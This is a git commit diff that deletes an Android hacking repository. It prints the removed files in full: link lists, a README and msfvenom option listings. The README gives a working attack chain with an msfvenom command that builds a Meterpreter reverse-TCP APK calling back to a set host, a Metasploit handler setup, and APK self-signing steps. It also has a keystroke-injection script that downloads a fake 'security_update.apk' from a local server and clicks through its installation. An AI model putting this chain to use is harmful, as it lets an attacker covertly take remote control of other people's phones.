Compare commits

..

1 Commits

Author SHA1 Message Date
PrincessPi 4c0f846ffb Initial commit 2026-05-27 03:21:50 +00:00
556 changed files with 2 additions and 46459 deletions
-121
View File
@@ -1,121 +0,0 @@
Creative Commons Legal Code
CC0 1.0 Universal
CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE
LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN
ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS
INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES
REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS
PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM
THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED
HEREUNDER.
Statement of Purpose
The laws of most jurisdictions throughout the world automatically confer
exclusive Copyright and Related Rights (defined below) upon the creator
and subsequent owner(s) (each and all, an "owner") of an original work of
authorship and/or a database (each, a "Work").
Certain owners wish to permanently relinquish those rights to a Work for
the purpose of contributing to a commons of creative, cultural and
scientific works ("Commons") that the public can reliably and without fear
of later claims of infringement build upon, modify, incorporate in other
works, reuse and redistribute as freely as possible in any form whatsoever
and for any purposes, including without limitation commercial purposes.
These owners may contribute to the Commons to promote the ideal of a free
culture and the further production of creative, cultural and scientific
works, or to gain reputation or greater distribution for their Work in
part through the use and efforts of others.
For these and/or other purposes and motivations, and without any
expectation of additional consideration or compensation, the person
associating CC0 with a Work (the "Affirmer"), to the extent that he or she
is an owner of Copyright and Related Rights in the Work, voluntarily
elects to apply CC0 to the Work and publicly distribute the Work under its
terms, with knowledge of his or her Copyright and Related Rights in the
Work and the meaning and intended legal effect of CC0 on those rights.
1. Copyright and Related Rights. A Work made available under CC0 may be
protected by copyright and related or neighboring rights ("Copyright and
Related Rights"). Copyright and Related Rights include, but are not
limited to, the following:
i. the right to reproduce, adapt, distribute, perform, display,
communicate, and translate a Work;
ii. moral rights retained by the original author(s) and/or performer(s);
iii. publicity and privacy rights pertaining to a person's image or
likeness depicted in a Work;
iv. rights protecting against unfair competition in regards to a Work,
subject to the limitations in paragraph 4(a), below;
v. rights protecting the extraction, dissemination, use and reuse of data
in a Work;
vi. database rights (such as those arising under Directive 96/9/EC of the
European Parliament and of the Council of 11 March 1996 on the legal
protection of databases, and under any national implementation
thereof, including any amended or successor version of such
directive); and
vii. other similar, equivalent or corresponding rights throughout the
world based on applicable law or treaty, and any national
implementations thereof.
2. Waiver. To the greatest extent permitted by, but not in contravention
of, applicable law, Affirmer hereby overtly, fully, permanently,
irrevocably and unconditionally waives, abandons, and surrenders all of
Affirmer's Copyright and Related Rights and associated claims and causes
of action, whether now known or unknown (including existing as well as
future claims and causes of action), in the Work (i) in all territories
worldwide, (ii) for the maximum duration provided by applicable law or
treaty (including future time extensions), (iii) in any current or future
medium and for any number of copies, and (iv) for any purpose whatsoever,
including without limitation commercial, advertising or promotional
purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each
member of the public at large and to the detriment of Affirmer's heirs and
successors, fully intending that such Waiver shall not be subject to
revocation, rescission, cancellation, termination, or any other legal or
equitable action to disrupt the quiet enjoyment of the Work by the public
as contemplated by Affirmer's express Statement of Purpose.
3. Public License Fallback. Should any part of the Waiver for any reason
be judged legally invalid or ineffective under applicable law, then the
Waiver shall be preserved to the maximum extent permitted taking into
account Affirmer's express Statement of Purpose. In addition, to the
extent the Waiver is so judged Affirmer hereby grants to each affected
person a royalty-free, non transferable, non sublicensable, non exclusive,
irrevocable and unconditional license to exercise Affirmer's Copyright and
Related Rights in the Work (i) in all territories worldwide, (ii) for the
maximum duration provided by applicable law or treaty (including future
time extensions), (iii) in any current or future medium and for any number
of copies, and (iv) for any purpose whatsoever, including without
limitation commercial, advertising or promotional purposes (the
"License"). The License shall be deemed effective as of the date CC0 was
applied by Affirmer to the Work. Should any part of the License for any
reason be judged legally invalid or ineffective under applicable law, such
partial invalidity or ineffectiveness shall not invalidate the remainder
of the License, and in such case Affirmer hereby affirms that he or she
will not (i) exercise any of his or her remaining Copyright and Related
Rights in the Work or (ii) assert any associated claims and causes of
action with respect to the Work, in either case contrary to Affirmer's
express Statement of Purpose.
4. Limitations and Disclaimers.
a. No trademark or patent rights held by Affirmer are waived, abandoned,
surrendered, licensed or otherwise affected by this document.
b. Affirmer offers the Work as-is and makes no representations or
warranties of any kind concerning the Work, express, implied,
statutory or otherwise, including without limitation warranties of
title, merchantability, fitness for a particular purpose, non
infringement, or the absence of latent or other defects, accuracy, or
the present or absence of errors, whether or not discoverable, all to
the greatest extent permissible under applicable law.
c. Affirmer disclaims responsibility for clearing rights of other persons
that may apply to the Work or any use thereof, including without
limitation any person's Copyright and Related Rights in the Work.
Further, Affirmer disclaims responsibility for obtaining any necessary
consents, permissions or other rights required for any use of the
Work.
d. Affirmer understands and acknowledges that Creative Commons is not a
party to this document and has no duty or obligation with respect to
this CC0 or use of the Work.
-13
View File
@@ -1,13 +0,0 @@
* [ROBTRT421/apk.android.meterpreter.msfvenom](https://github.com/ROBTRT421/apk.android.meterpreter.msfvenom)
* [AzeemIdrisi/PhoneSploit-Pro](https://github.com/AzeemIdrisi/PhoneSploit-Pro)
* [apksigner](https://developer.android.com/tools/apksigner)
* [App Signing](https://developer.android.com/studio/publish/app-signing#generate-key)
* [Android Studio](https://developer.android.com/studio)
* [msfvenom docs](https://www.offsec.com/metasploit-unleashed/msfvenom/)
* [Meterpreter on Android Blog Post](https://medium.com/@S3Curiosity/exploring-the-power-of-msfvenom-for-android-meterpreter-in-ethical-hacking-8c6b54bc66ad)
* [David Bombal's Rubber Ducky Meterpreter Payload](https://github.com/davidbombal/hak5/blob/main/omg_android9SGS8_meterpreter)
* [APK Install Rubber Ducky Payload](https://payloadhub.com/blogs/payloads/android-meterpreter-apk-install)
* [o.mg cable meterpreter android (youtube)](https://www.youtube.com/watch?v=LRVlaNfthbg)
* [o.mg android payloads](https://github.com/hak5/omg-payloads/tree/master/payloads/library/mobile/android)
* [o.mg android meterpreter payloads](https://github.com/hak5/omg-payloads/tree/master/payloads/library/mobile/android/meterpreter)
* [Tutorial on android meterpreter](https://samsclass.info/128/proj/M410a.htm)
+2 -73
View File
@@ -1,73 +1,2 @@
# Android Hackfuckin # android-hackhackin
## Meterpreter
`msfvenom --payload android/meterpreter_reverse_tcp LHOST=10.0.0.51 LPORT=443 R > rawdoggin_output.apk`
## Msfconsole
```
sudo msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter_reverse_tcp
msf exploit(handler) > set lhost 10.0.0.51
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit -j
```
## Python Shitfuckery
`python -m http.server 8787`
## Self Sign an apk
### Install tools
1. `sudo apt update`
2. `sudo apt install apktool gnupg2 android-tools-adb default-jdk -y`
### Create Signing Key
* `keytool -genkey -v -keystore android.keystore -alias android -keyalg RSA -keysize 2048 -validity 10000`
### Sign Apk
* `jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore android.keystore my_app.apk android`
## Some Shit
```
TAB
DELAY 250
GUI b
DELAY 800
CTRL SHIFT n
DELAY 500
CTRL l
DELAY 1000
STRING 192.168.4.4:9002/security_update.apk
ENTER
DELAY 7000
TAB
TAB
DOWN
RIGHT
ENTER
DELAY 1000
TAB
ENTER
TAB
TAB
RIGHT
ENTER
TAB
ENTER
TAB
ENTER
DELAY 2000
TAB
ENTER
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
DELAY 350
TAB
ENTER
DELAY 350
ENTER
```
View File
-1922
View File
File diff suppressed because it is too large Load Diff
-42
View File
@@ -1,42 +0,0 @@
Framework Architectures [--arch <value>]
========================================
Name
----
aarch64
armbe
armle
cbea
cbea64
cmd
dalvik
firefox
java
loongarch64
mips
mips64
mips64le
mipsbe
mipsle
nodejs
php
ppc
ppc64
ppc64le
ppce500v2
python
r
riscv32be
riscv32le
riscv64be
riscv64le
ruby
sparc
sparc64
tty
x64
x86
x86_64
zarch
-11
View File
@@ -1,11 +0,0 @@
Framework Encryption Formats [--encrypt <value>]
================================================
Name
----
aes256
base64
rc4
xor
-76
View File
@@ -1,76 +0,0 @@
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
ducky-script-psh
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
base32
base64
bash
c
csharp
dw
dword
go
golang
hex
java
js_be
js_le
masm
nim
nimlang
num
octal
perl
pl
powershell
ps1
py
python
raw
rb
ruby
rust
rustlang
sh
vbapplication
vbscript
zig
-32
View File
@@ -1,32 +0,0 @@
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
-20
View File
@@ -1,20 +0,0 @@
Framework NOPs (13 total)
=========================
Name Description
---- -----------
aarch64/simple Simple NOP generator
armle/simple Simple NOP generator
cmd/generic Generates harmless padding for command payloads.
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
riscv32le/simple Simple NOP generator
riscv64le/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator
@@ -1,32 +0,0 @@
Name: AIX Command Shell, Bind TCP Inline
Module: payload/aix/ppc/shell_bind_tcp
Platform: AIX
Arch: ppc
Needs Admin: No
Total size: 264
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AIX 6.1.4 yes IBM AIX Version
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,31 +0,0 @@
Name: AIX Command Shell, Find Port Inline
Module: payload/aix/ppc/shell_find_port
Platform: AIX
Arch: ppc
Needs Admin: No
Total size: 220
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AIX 6.1.4 yes IBM AIX Version
CPORT 64342 no The local client port
Description:
Spawn a shell on an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,30 +0,0 @@
Name: AIX execve Shell for inetd
Module: payload/aix/ppc/shell_interact
Platform: AIX
Arch: ppc
Needs Admin: No
Total size: 56
Rank: Normal
Provided by:
jduck <jduck@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AIX 6.1.4 yes IBM AIX Version
Description:
Simply execve /bin/sh (for inetd programs)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,39 +0,0 @@
Name: AIX Command Shell, Reverse TCP Inline
Module: payload/aix/ppc/shell_reverse_tcp
Platform: AIX
Arch: ppc
Needs Admin: No
Total size: 204
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AIX 6.1.4 yes IBM AIX Version
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,74 +0,0 @@
Name: Android Meterpreter, Android Reverse HTTP Stager
Module: payload/android/meterpreter/reverse_http
Platform: Android
Arch: dalvik
Needs Admin: N
Evasion options for payload/android/meterpreter/reverse_http:
=========================
t.com>
OJ Reeves
anwarelmakrahy
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Run a meterpreter server in Android.
Tunnel communication over HTTP
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,76 +0,0 @@
Name: Android Meterpreter, Android Reverse HTTPS Stager
Module: payload/android/meterpreter/reverse_https
Platform: Android
Arch: dalvik
Needs Admin: N
Evasion options for payload/android/meterpreter/reverse_https:
=========================
.com>
OJ Reeves
anwarelmakrahy
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Run a meterpreter server in Android.
Tunnel communication over HTTPS
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,66 +0,0 @@
Name: Android Meterpreter, Android Reverse TCP Stager
Module: payload/android/meterpreter/reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 10217
Rank: Normal
Provided by:
mihi
egypt <egypt@metasploit.com>
OJ Reeves
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in Android.
Connect back stager
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,58 +0,0 @@
Name: Android Meterpreter Shell, Reverse HTTP Inline
Module: payload/android/meterpreter_reverse_http
Platform: Android
Arch: dalvik
Needs Admin: No
Evasion options for payload/android/meterpreter_reverse_http:
=========================
g Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Connect back to attacker and spawn a Meterpreter shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,60 +0,0 @@
Name: Android Meterpreter Shell, Reverse HTTPS Inline
Module: payload/android/meterpreter_reverse_https
Platform: Android
Arch: dalvik
Needs Admin: No
Evasion options for payload/android/meterpreter_reverse_https:
=========================
Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Connect back to attacker and spawn a Meterpreter shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
